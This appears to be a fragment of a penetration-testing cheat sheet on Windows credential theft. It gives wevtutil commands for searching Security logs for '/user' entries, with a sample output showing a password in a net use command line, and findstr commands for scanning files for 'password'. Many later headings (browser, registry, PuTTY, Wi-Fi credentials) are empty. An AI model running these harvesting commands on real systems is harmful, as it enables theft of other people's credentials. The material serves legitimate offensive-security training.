Credential Theft
Searching Security Logs Using wevtutil
PS C:\dbs> wevtutil qe Security /rd:true /f:text | Select-String "/user"Example Output:
Process Command Line: net use T: \\dbs\users /user:dollar P@sswordSearching for Credentials in Files
Using Command Prompt
C:\dbs> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xmlC:\dbs> findstr /S /I /C:"password" "C:\Users\*"*.txt *.ini *.cfg *.config *.xmlC:\dbs> cd C:\Users\dollarboysushil\Documents & findstr /SI /M "password" *.xml *.ini *.txt
Using PowerShell
Further Credential Theft
Listing Stored Credentials
Retrieving Browser Credentials
Windows AutoLogon
Example Output:
Clear-Text Password Storage in the Registry
PuTTY
Viewing Saved Wireless Networks
PowerShell Credentials
Example Commands:
Last updated